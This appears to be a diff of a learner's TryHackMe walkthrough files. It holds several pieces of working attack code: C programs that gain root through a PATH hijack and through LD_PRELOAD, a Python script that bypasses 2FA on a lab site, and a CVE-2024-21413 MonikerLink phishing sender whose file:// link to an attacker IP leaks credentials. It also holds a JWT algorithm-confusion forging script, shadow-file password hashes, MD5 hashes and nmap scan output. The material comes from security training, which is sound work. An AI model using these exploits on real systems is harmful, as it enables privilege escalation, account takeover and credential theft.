frank:$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1:18796:0:99999:7:::

3
Walkthroughs/JWT/example1.txt Normal file
View File

@@ -0,0 +1,3 @@
{
"token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJwYXNzd29yZCI6InBhc3N3b3JkMSIsImFkbWluIjowLCJmbGFnIjoiVEhNezljYzAzOWNjLWQ4NWYtNDVkMS1hYzNiLTgxOGM4MzgzYTU2MH0ifQ.TkIH_A1zu1mu-zu6_9w_R4FUlYadkyjmXWyD5sqWd5U"
}

3
Walkthroughs/JWT/example2.txt Normal file
View File

@@ -0,0 +1,3 @@
{
"token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJhZG1pbiI6MH0.UWddiXNn-PSpe7pypTWtSRZJi1wr2M5cpr_8uWISMS4"
}

3
Walkthroughs/JWT/example3.txt Normal file
View File

@@ -0,0 +1,3 @@
{
"token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJhZG1pbiI6MH0._yybkWiZVAe1djUIE9CRa0wQslkRmLODBPNsjsY8FO8"
}

3
Walkthroughs/JWT/example4.txt Normal file
View File

@@ -0,0 +1,3 @@
{
"token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJhZG1pbiI6MH0.yN1f3Rq8b26KEUYHCZbEwEk6LVzRYtbGzJMFIF8i5HY"
}

11
Walkthroughs/JWT/example5.py Normal file
View File

@@ -0,0 +1,11 @@
import jwt
public_key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHSoarRoLvgAk4O41RE0w6lj2e7TDTbFk62WvIdJFo/aSLX/x9oc3PDqJ0Qu1x06/8PubQbCSLfWUyM7Dk0+irzb/VpWAurSh+hUvqQCkHmH9mrWpMqs5/L+rluglPEPhFwdL5yWk5kS7rZMZz7YaoYXwI7Ug4Es4iYbf6+UV0sudGwc3HrQ5uGUfOpmixUO0ZgTUWnrfMUpy2dFbZp7puQS6T8b5EJPpLY+iojMb/rbPB34NrvJKU1F84tfvY8xtg3HndTNPyNWp7EOsujKZIxKF5/RdW+Qf9jjBMvsbjfCo0LiNVjpotiLPVuslsEWun+LogxR+fxLiUehSBb8ip"
payload = {
"username" : "user",
"admin" : 0
}
access_token = jwt.encode(payload, public_key, algorithm="HS256")
print(access_token)

4
Walkthroughs/JWT/example5.txt Normal file
View File

@@ -0,0 +1,4 @@
{
"public_key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHSoarRoLvgAk4O41RE0w6lj2e7TDTbFk62WvIdJFo/aSLX/x9oc3PDqJ0Qu1x06/8PubQbCSLfWUyM7Dk0+irzb/VpWAurSh+hUvqQCkHmH9mrWpMqs5/L+rluglPEPhFwdL5yWk5kS7rZMZz7YaoYXwI7Ug4Es4iYbf6+UV0sudGwc3HrQ5uGUfOpmixUO0ZgTUWnrfMUpy2dFbZp7puQS6T8b5EJPpLY+iojMb/rbPB34NrvJKU1F84tfvY8xtg3HndTNPyNWp7EOsujKZIxKF5/RdW+Qf9jjBMvsbjfCo0LiNVjpotiLPVuslsEWun+LogxR+fxLiUehSBb8ip",
"token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJhZG1pbiI6MH0.kR4DjBkwFE9dzPNeiboHqkPhs52QQgaHcC2_UGCtJ3qo2uY-vANIC6qicdsfT37McWYauzm92xflspmSVvrvwXdC2DAL9blz3YRfUOcXJT03fVM7nGp8E7uWSBy9UESLQ6PBZ_c_dTUJhWg35K3d8Jao2czC0JGN3EQxhcCGtxJ1R7T9tzBMaqW-IRXfTCq3BOxVVF66ePEfvG7gdyjAnWrQFktRBIhU4LoYwem3UZ7PolFf0v2i6jpnRJzMpqd2c9oMHOjhCZpy_yJNl-1F_UBbAF1L-pn6SHBOFdIFt_IasJDVPr1Ybv75M26o8OBwUJ1KK_rwX41y5BCNGcks9Q"
}

3
Walkthroughs/JWT/example7_appA.txt Normal file
View File

@@ -0,0 +1,3 @@
{
"token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJhZG1pbiI6MCwiYXVkIjoiYXBwQSJ9.sl-84cMLYjxsD7SCySnnv3J9AMII9NKgz0-0vcak9t4"
}

3
Walkthroughs/JWT/example7_appB.txt Normal file
View File

@@ -0,0 +1,3 @@
{
"token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJhZG1pbiI6MSwiYXVkIjoiYXBwQiJ9.jrTcVTGY9VIo-a-tYq_hvRTfnB4dMi_7j98Xvm-xb6o"
}

103979
Walkthroughs/JWT/jwt.secrets.list Normal file
View File

File diff suppressed because it is too large Load Diff

1
Walkthroughs/JWT/jwt.txt Normal file
View File

@@ -0,0 +1 @@
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJhZG1pbiI6MH0.yN1f3Rq8b26KEUYHCZbEwEk6LVzRYtbGzJMFIF8i5HY

52
Walkthroughs/LinuxPrivilegeEscalation/CapstoneChallenge/passwd.txt Normal file
View File

@@ -0,0 +1,52 @@
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
colord:x:998:995:User for colord:/var/lib/colord:/sbin/nologin
unbound:x:997:994:Unbound DNS resolver:/etc/unbound:/sbin/nologin
libstoragemgmt:x:996:993:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth:x:995:76:Saslauthd user:/run/saslauthd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster:x:994:992:GlusterFS daemons:/run/gluster:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
setroubleshoot:x:993:990::/var/lib/setroubleshoot:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
chrony:x:992:987::/var/lib/chrony:/sbin/nologin
saned:x:991:986:SANE scanner daemon user:/usr/share/sane:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
sssd:x:990:984:User for sssd:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
geoclue:x:989:983:User for geoclue:/var/lib/geoclue:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
gnome-initial-setup:x:988:982::/run/gnome-initial-setup/:/sbin/nologin
pcp:x:987:981:Performance Co-Pilot:/var/lib/pcp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/var/lib/oprofile:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
leonard:x:1000:1000:leonard:/home/leonard:/bin/bash
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
missy:x:1001:1001::/home/missy:/bin/bash

52
Walkthroughs/LinuxPrivilegeEscalation/CapstoneChallenge/passwords.txt Normal file
View File

@@ -0,0 +1,52 @@
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:/sbin/nologin
daemon:*:2:2:daemon:/sbin:/sbin/nologin
adm:*:3:4:adm:/var/adm:/sbin/nologin
lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
operator:*:11:0:operator:/root:/sbin/nologin
games:*:12:100:games:/usr/games:/sbin/nologin
ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:*:99:99:Nobody:/:/sbin/nologin
pegasus:!!:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
systemd-network:!!:192:192:systemd Network Management:/:/sbin/nologin
dbus:!!:81:81:System message bus:/:/sbin/nologin
polkitd:!!:999:998:User for polkitd:/:/sbin/nologin
colord:!!:998:995:User for colord:/var/lib/colord:/sbin/nologin
unbound:!!:997:994:Unbound DNS resolver:/etc/unbound:/sbin/nologin
libstoragemgmt:!!:996:993:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth:!!:995:76:Saslauthd user:/run/saslauthd:/sbin/nologin
rpc:!!:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster:!!:994:992:GlusterFS daemons:/run/gluster:/sbin/nologin
abrt:!!:173:173::/etc/abrt:/sbin/nologin
postfix:!!:89:89::/var/spool/postfix:/sbin/nologin
setroubleshoot:!!:993:990::/var/lib/setroubleshoot:/sbin/nologin
rtkit:!!:172:172:RealtimeKit:/proc:/sbin/nologin
pulse:!!:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
radvd:!!:75:75:radvd user:/:/sbin/nologin
chrony:!!:992:987::/var/lib/chrony:/sbin/nologin
saned:!!:991:986:SANE scanner daemon user:/usr/share/sane:/sbin/nologin
apache:!!:48:48:Apache:/usr/share/httpd:/sbin/nologin
qemu:!!:107:107:qemu user:/:/sbin/nologin
ntp:!!:38:38::/etc/ntp:/sbin/nologin
tss:!!:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
sssd:!!:990:984:User for sssd:/:/sbin/nologin
usbmuxd:!!:113:113:usbmuxd user:/:/sbin/nologin
geoclue:!!:989:983:User for geoclue:/var/lib/geoclue:/sbin/nologin
gdm:!!:42:42::/var/lib/gdm:/sbin/nologin
rpcuser:!!:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:!!:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
gnome-initial-setup:!!:988:982::/run/gnome-initial-setup/:/sbin/nologin
pcp:!!:987:981:Performance Co-Pilot:/var/lib/pcp:/sbin/nologin
sshd:!!:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:!!:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
oprofile:!!:16:16:Special user account to be used by OProfile:/var/lib/oprofile:/sbin/nologin
tcpdump:!!:72:72::/:/sbin/nologin
leonard:$6$JELumeiiJFPMFj3X$OXKY.N8LDHHTtF5Q/pTCsWbZtO6SfAzEQ6UkeFJy.Kx5C9rXFuPr.8n3v7TbZEttkGKCVj50KavJNAm7ZjRi4/:1000:1000:leonard:/home/leonard:/bin/bash
mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:!!:51:51::/var/spool/mqueue:/sbin/nologin
nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:1001:1001::/home/missy:/bin/bash

BIN
Walkthroughs/LinuxPrivilegeEscalation/CapstoneChallenge/rev_shell.exe Normal file
View File

Binary file not shown.

52
Walkthroughs/LinuxPrivilegeEscalation/CapstoneChallenge/shadow.txt Normal file
View File

@@ -0,0 +1,52 @@
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::
bin:*:18353:0:99999:7:::
daemon:*:18353:0:99999:7:::
adm:*:18353:0:99999:7:::
lp:*:18353:0:99999:7:::
sync:*:18353:0:99999:7:::
shutdown:*:18353:0:99999:7:::
halt:*:18353:0:99999:7:::
mail:*:18353:0:99999:7:::
operator:*:18353:0:99999:7:::
games:*:18353:0:99999:7:::
ftp:*:18353:0:99999:7:::
nobody:*:18353:0:99999:7:::
pegasus:!!:18785::::::
systemd-network:!!:18785::::::
dbus:!!:18785::::::
polkitd:!!:18785::::::
colord:!!:18785::::::
unbound:!!:18785::::::
libstoragemgmt:!!:18785::::::
saslauth:!!:18785::::::
rpc:!!:18785:0:99999:7:::
gluster:!!:18785::::::
abrt:!!:18785::::::
postfix:!!:18785::::::
setroubleshoot:!!:18785::::::
rtkit:!!:18785::::::
pulse:!!:18785::::::
radvd:!!:18785::::::
chrony:!!:18785::::::
saned:!!:18785::::::
apache:!!:18785::::::
qemu:!!:18785::::::
ntp:!!:18785::::::
tss:!!:18785::::::
sssd:!!:18785::::::
usbmuxd:!!:18785::::::
geoclue:!!:18785::::::
gdm:!!:18785::::::
rpcuser:!!:18785::::::
nfsnobody:!!:18785::::::
gnome-initial-setup:!!:18785::::::
pcp:!!:18785::::::
sshd:!!:18785::::::
avahi:!!:18785::::::
oprofile:!!:18785::::::
tcpdump:!!:18785::::::
leonard:$6$JELumeiiJFPMFj3X$OXKY.N8LDHHTtF5Q/pTCsWbZtO6SfAzEQ6UkeFJy.Kx5C9rXFuPr.8n3v7TbZEttkGKCVj50KavJNAm7ZjRi4/::0:99999:7:::
mailnull:!!:18785::::::
smmsp:!!:18785::::::
nscd:!!:18785::::::
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::

BIN
Walkthroughs/LinuxPrivilegeEscalation/path Executable file
View File

Binary file not shown.

9
Walkthroughs/LinuxPrivilegeEscalation/path_exp.c Normal file
View File

@@ -0,0 +1,9 @@
#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
void main() {
setuid(0);
setgid(0);
system("thm");
}

10
Walkthroughs/LinuxPrivilegeEscalation/shell.c Normal file
View File

@@ -0,0 +1,10 @@
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

95
Walkthroughs/MFA/script.py Normal file
View File

@@ -0,0 +1,95 @@
import requests
# Define the URLs for the login, 2FA process, and dashboard
login_url = 'http://mfa.thm/labs/third/'
otp_url = 'http://mfa.thm/labs/third/mfa'
dashboard_url = 'http://mfa.thm/labs/third/dashboard'
# Define login credentials
credentials = {
'email': 'thm@mail.thm',
'password': 'test123'
}
# Define the headers to mimic a real browser
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://mfa.thm',
'Connection': 'close',
'Referer': 'http://mfa.thm/labs/third/mfa',
'Upgrade-Insecure-Requests': '1'
}
# Function to check if the response contains the login page
def is_login_successful(response):
return "User Verification" in response.text and response.status_code == 200
# Function to handle the login process
def login(session):
response = session.post(login_url, data=credentials, headers=headers)
return response
# Function to handle the 2FA process
def submit_otp(session, otp):
# Split the OTP into individual digits
otp_data = {
'code-1': otp[0],
'code-2': otp[1],
'code-3': otp[2],
'code-4': otp[3]
}
response = session.post(otp_url, data=otp_data, headers=headers, allow_redirects=False) # Disable auto redirects
print(f"DEBUG: OTP submission response status code: {response.status_code}")
return response
# Function to check if the response contains the login page
def is_login_page(response):
return "Sign in to your account" in response.text or "Login" in response.text
# Function to attempt login and submit the hardcoded OTP until success
def try_until_success():
otp_str = '1337' # Hardcoded OTP
while True: # Keep trying until success
session = requests.Session() # Create a new session object for each attempt
login_response = login(session) # Log in before each OTP attempt
if is_login_successful(login_response):
print("Logged in successfully.")
else:
print("Failed to log in.")
continue
print(f"Trying OTP: {otp_str}")
response = submit_otp(session, otp_str)
# Check if the response is the login page (unsuccessful OTP)
if is_login_page(response):
print(f"Unsuccessful OTP attempt, redirected to login page. OTP: {otp_str}")
continue # Retry login and OTP submission
# Check if the response is a redirect (status code 302)
if response.status_code == 302:
location_header = response.headers.get('Location', '')
print(f"Session cookies: {session.cookies.get_dict()}")
# Check if it successfully bypassed 2FA and landed on the dashboard
if location_header == '/labs/third/dashboard':
print(f"Successfully bypassed 2FA with OTP: {otp_str}")
return session.cookies.get_dict() # Return session cookies after successful bypass
elif location_header == '/labs/third/':
print(f"Failed OTP attempt. Redirected to login. OTP: {otp_str}")
else:
print(f"Unexpected redirect location: {location_header}. OTP: {otp_str}")
else:
print(f"Received status code {response.status_code}. Retrying...")
# Start the attack to try until success
try_until_success()

1
Walkthroughs/Metasploit/jchamber.hash Normal file
View File

@@ -0,0 +1 @@
jchambers:69596c7aa1e8daee17f8e78870e25a5c

1
Walkthroughs/Metasploit/jon.hash Normal file
View File

@@ -0,0 +1 @@
Jon:ffb43f0de35be4d9917ac0cc8ad57f8d

BIN
Walkthroughs/Metasploit/rev_shell.elf Normal file
View File

Binary file not shown.

BIN
Walkthroughs/Metasploit/shell.elf Normal file
View File

Binary file not shown.

45
Walkthroughs/MonikerLink/attack.py Normal file
View File

@@ -0,0 +1,45 @@
'''
Author: CMNatic | https://github.com/cmnatic
Version: 1.0 | 19/02/2024
'''
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr
sender_email = 'attacker@monikerlink.thm' # Replace with your sender email address
receiver_email = 'victim@monikerlink.thm' # Replace with the recipient email address
password = input("Enter your attacker email password: ")
html_content = """\
<!DOCTYPE html>
<html lang="en">
<p><a href="file://10.14.99.89/test!exploit">Click me</a></p>
</body>
</html>"""
message = MIMEMultipart()
message['Subject'] = "CVE-2024-21413"
message["From"] = formataddr(('CMNatic', sender_email))
message["To"] = receiver_email
# Convert the HTML string into bytes and attach it to the message object
msgHtml = MIMEText(html_content,'html')
message.attach(msgHtml)
server = smtplib.SMTP('MAILSERVER', 25)
server.ehlo()
try:
server.login(sender_email, password)
except Exception as err:
print(err)
exit(-1)
try:
server.sendmail(sender_email, [receiver_email], message.as_string())
print("\n Email delivered")
except Exception as error:
print(error)
finally:
server.quit()

129
Walkthroughs/NMap/scan_172_17_network.gnmap Normal file
View File

@@ -0,0 +1,129 @@
# Nmap 7.20 scan initiated Feb 11 04:29:20 2021 as: nmap -sS -n -oA scan_172_17_network 172.17.35.1/20
Host: 172.17.0.1 () Status: Up
Host: 172.17.0.1 () Status: Up
Host: 172.17.0.215 () Status: Up
Host: 172.17.0.215 () Ports: 22/closed/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https/// Ignored State: filtered (997)
Host: 172.17.0.240 () Status: Up
Host: 172.17.0.240 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 172.17.1.78 () Status: Up
Host: 172.17.1.78 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 172.17.1.106 () Status: Up
Host: 172.17.1.106 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 9999/open/tcp//abyss/// Ignored State: closed (997)
Host: 172.17.1.131 () Status: Up
Host: 172.17.1.131 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 172.17.1.184 () Status: Up
Host: 172.17.1.184 () Ports: 8081/open/tcp//blackice-icecap/// Ignored State: closed (999)
Host: 172.17.1.228 () Status: Up
Host: 172.17.1.228 () Ports: 22/open/tcp//ssh///, 53/open/tcp//domain///, 8009/open/tcp//ajp13///, 8080/open/tcp//http-proxy/// Ignored State: closed (996)
Host: 172.17.1.234 () Status: Up
Host: 172.17.1.234 () Ports: 21/closed/tcp//ftp///, 22/open/tcp//ssh///, 23/closed/tcp//telnet///, 25/closed/tcp//smtp///, 53/closed/tcp//domain///, 80/closed/tcp//http///, 110/closed/tcp//pop3///, 111/closed/tcp//rpcbind///, 113/closed/tcp//ident///, 135/closed/tcp//msrpc///, 139/closed/tcp//netbios-ssn///, 199/closed/tcp//smux///, 445/closed/tcp//microsoft-ds///, 554/closed/tcp//rtsp///, 587/closed/tcp//submission///, 993/closed/tcp//imaps///, 995/closed/tcp//pop3s///, 1025/closed/tcp//NFS-or-IIS///, 1720/closed/tcp//h323q931///, 1723/closed/tcp//pptp///, 3306/closed/tcp//mysql///, 5900/closed/tcp//vnc///, 8888/closed/tcp//sun-answerbook/// Ignored State: filtered (977)
Host: 172.17.2.137 () Status: Up
Host: 172.17.2.137 () Ports: 3306/open/tcp//mysql///
Host: 172.17.2.215 () Status: Up
Host: 172.17.2.215 () Ports: 21/open/tcp//ftp///, 53/open/tcp//domain///, 80/open/tcp//http///, 135/open/tcp//msrpc///, 3389/open/tcp//ms-wbt-server/// Ignored State: filtered (995)
Host: 172.17.2.251 () Status: Up
Host: 172.17.2.251 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 3389/open/tcp//ms-wbt-server///, 5901/open/tcp//vnc-1///, 6001/open/tcp//X11:1///, 8000/open/tcp//http-alt/// Ignored State: closed (993)
Host: 172.17.3.102 () Status: Up
Host: 172.17.3.102 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 172.17.3.145 () Status: Up
Host: 172.17.3.145 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 8009/open/tcp//ajp13///, 8080/open/tcp//http-proxy/// Ignored State: closed (994)
Host: 172.17.3.222 () Status: Up
Host: 172.17.3.222 () Ports: 22/open/tcp//ssh///, 3000/open/tcp//ppp///, 3306/open/tcp//mysql///, 8000/open/tcp//http-alt/// Ignored State: closed (996)
Host: 172.17.4.16 () Status: Up
Host: 172.17.4.16 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 172.17.4.245 () Status: Up
Host: 172.17.4.245 () Ports: 80/open/tcp//http/// Ignored State: closed (999)
Host: 172.17.5.56 () Status: Up
Host: 172.17.5.56 () Ports: 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 464/open/tcp//kpasswd5///, 593/open/tcp//http-rpc-epmap///, 3268/open/tcp//globalcatLDAP///, 3269/open/tcp//globalcatLDAPssl///, 3389/open/tcp//ms-wbt-server/// Ignored State: filtered (989)
Host: 172.17.5.70 () Status: Up
Host: 172.17.5.70 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 3389/open/tcp//ms-wbt-server///, 5901/open/tcp//vnc-1///, 6001/open/tcp//X11:1///, 8000/open/tcp//http-alt/// Ignored State: closed (993)
Host: 172.17.6.21 () Status: Up
Host: 172.17.6.21 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (997)
Host: 172.17.6.42 () Status: Up
Host: 172.17.6.42 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 3389/open/tcp//ms-wbt-server///, 5901/open/tcp//vnc-1///, 6001/open/tcp//X11:1///, 8000/open/tcp//http-alt/// Ignored State: closed (993)
Host: 172.17.6.97 () Status: Up
Host: 172.17.6.97 () Ports: 3389/open/tcp//ms-wbt-server/// Ignored State: filtered (999)
Host: 172.17.6.109 () Status: Up
Host: 172.17.6.109 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 110/open/tcp//pop3///, 139/open/tcp//netbios-ssn///, 143/open/tcp//imap///, 445/open/tcp//microsoft-ds/// Ignored State: closed (994)
Host: 172.17.7.135 () Status: Up
Host: 172.17.7.135 () Ports: 3389/open/tcp//ms-wbt-server/// Ignored State: filtered (999)
Host: 172.17.8.131 () Status: Up
Host: 172.17.8.131 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 172.17.8.147 () Status: Up
Host: 172.17.8.147 () Ports: 53/open/tcp//domain///, 80/open/tcp//http///, 88/open/tcp//kerberos-sec///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 464/open/tcp//kpasswd5///, 593/open/tcp//http-rpc-epmap///, 636/open/tcp//ldapssl///, 3268/open/tcp//globalcatLDAP///, 3269/open/tcp//globalcatLDAPssl///, 3389/open/tcp//ms-wbt-server/// Ignored State: closed (987)
Host: 172.17.9.82 () Status: Up
Host: 172.17.9.82 () Ports: 22/open/tcp//ssh/// Ignored State: closed (999)
Host: 172.17.9.244 () Status: Up
Host: 172.17.9.244 () Ports: 80/open/tcp//http///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 8080/open/tcp//http-proxy///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49156/open/tcp//unknown///, 49165/open/tcp//unknown/// Ignored State: closed (988)
Host: 172.17.10.10 () Status: Up
Host: 172.17.10.10 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 172.17.10.13 () Status: Up
Host: 172.17.10.13 () Ports: 80/open/tcp//http///
Host: 172.17.10.100 () Status: Up
Host: 172.17.10.100 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 172.17.10.127 () Status: Up
Host: 172.17.10.127 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///
Host: 172.17.11.32 () Status: Up
Host: 172.17.11.32 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 3389/open/tcp//ms-wbt-server///, 5901/open/tcp//vnc-1///, 6001/open/tcp//X11:1///, 8000/open/tcp//http-alt/// Ignored State: closed (993)
Host: 172.17.11.45 () Status: Up
Host: 172.17.11.45 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 3389/open/tcp//ms-wbt-server///, 5901/open/tcp//vnc-1///, 6001/open/tcp//X11:1///, 8000/open/tcp//http-alt/// Ignored State: closed (993)
Host: 172.17.12.12 () Status: Up
Host: 172.17.12.12 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 3389/open/tcp//ms-wbt-server///
Host: 172.17.12.151 () Status: Up
Host: 172.17.12.151 () Ports: 22/open/tcp//ssh///, 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 464/open/tcp//kpasswd5///, 593/open/tcp//http-rpc-epmap///, 636/open/tcp//ldapssl///, 3268/open/tcp//globalcatLDAP///, 3269/open/tcp//globalcatLDAPssl///, 3389/open/tcp//ms-wbt-server/// Ignored State: closed (987)
Host: 172.17.12.227 () Status: Up
Host: 172.17.12.227 () Ports: 21/closed/tcp//ftp///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 135/closed/tcp//msrpc///, 139/closed/tcp//netbios-ssn///, 199/closed/tcp//smux///, 554/closed/tcp//rtsp///, 587/closed/tcp//submission///, 993/closed/tcp//imaps///, 1025/closed/tcp//NFS-or-IIS///, 1720/closed/tcp//h323q931///, 1723/closed/tcp//pptp/// Ignored State: filtered (988)
